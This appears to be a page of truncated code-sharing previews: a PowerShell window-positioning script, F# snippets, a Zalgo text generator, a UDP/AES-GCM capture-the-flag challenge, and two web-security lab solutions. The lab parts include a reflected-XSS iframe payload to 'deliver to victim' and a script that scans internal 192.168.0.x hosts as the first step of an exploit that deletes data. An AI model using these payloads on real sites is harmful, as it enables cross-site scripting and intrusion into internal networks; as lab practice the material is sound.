| # small powershell script that will move a window to a specified location. | |
| # used (as can be seen in the code) to move a borderless 1920x1080 Skyrim SE window to the middle of my 3840x1080 screen. | |
| add-type @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace WindowMethods { | |
| public class Imported { | |
| [DllImport("user32.dll")] | |
| public static extern bool SetWindowPos(IntPtr hWnd, IntPtr hWndInsertAfter, int X, int Y, int cx, int cy, uint uFlags); |
| /* | |
| Encrypted Server Chit Chat | |
| The VM you have to connect to has a UDP server running on port 4000. Once connected to this UDP server, send a UDP message with the payload "hello" to receive more information. You will find some sort of encryption(using the AES-GCM cipher). Using the information from the server, write a script to retrieve the flag. Here are some useful thingsto keep in mind: | |
| sending and receiving data over a network is done in bytes | |
| the PyCA encryption library and functions takes its inputs as bytes | |
| AES GCM sends both encrypted plaintext and tag, and the server sends these values sequentially in the form of the encrypted plaintext followed by the tag | |
| This machine may take up to 5 minutes to configure once deployed. Please be patient. |
Put this in the exploit server body and 'deliver to victim' (change the host for your lab host):
<iframe src="https://acb41fc71e32c9aa80aab06000f30012.web-security-academy.net/?search=%3Cbody+onresize%3D%22alert%28%27xss%27%29%22%3E" width=300 id="frame" onload="this.width = 500"></iframe>
| open System | |
| [<EntryPoint>] | |
| let main argv = | |
| printfn "enter lines and end with EOF\n" | |
| let sep = "\r\n" | |
| let rec builder acc = | |
| let line = Console.ReadLine () | |
| if line.Contains "EOF" then |
| open System.Security.Cryptography | |
| let encrypt psk (iv: byte[]) (inData: byte[]) = | |
| use aesObj = Aes.Create () | |
| aesObj.Mode <- CipherMode.ECB | |
| aesObj.Padding <- PaddingMode.None | |
| let zeroIv = Array.create 16 0uy | |
| let encryptor = aesObj.CreateEncryptor (psk, zeroIv) |
| <!-- each script tag below is a seperate exploit page to use on the server, for this multi-step lab --> | |
| <!-- technically only the first (to find the ip) and last (to execute the delete) are needed, but the | |
| middle two scripts were used by me to explore the site and craft the final exploit --> | |
| <!-- find the ip address of the internal endpoint --> | |
| <script> | |
| for(var i = 1; i <= 254; i++) { | |
| var req = new XMLHttpRequest(); | |
| req.open('get', 'http://192.168.0.' + i + ':8080/', true); | |
| req.onload = report(i); |
| let samples = [ | |
| "I am a monster." | |
| "I am a rock star." | |
| "I want to go to Hawaii." | |
| "I want to eat a hamburger." | |
| "I have a really big headache." | |
| "FSharp is a fun language." | |
| "Go eat a big hamburger." | |
| "Markov chains are fun to use." |
| /* <![CDATA[ */ | |
| //============================================================ | |
| // ZALGO text script by tchouky | |
| //============================================================ | |
| // data set of leet unicode chars | |
| //--------------------------------------------------- | |
| //those go UP | |
| var zalgo_up = [ |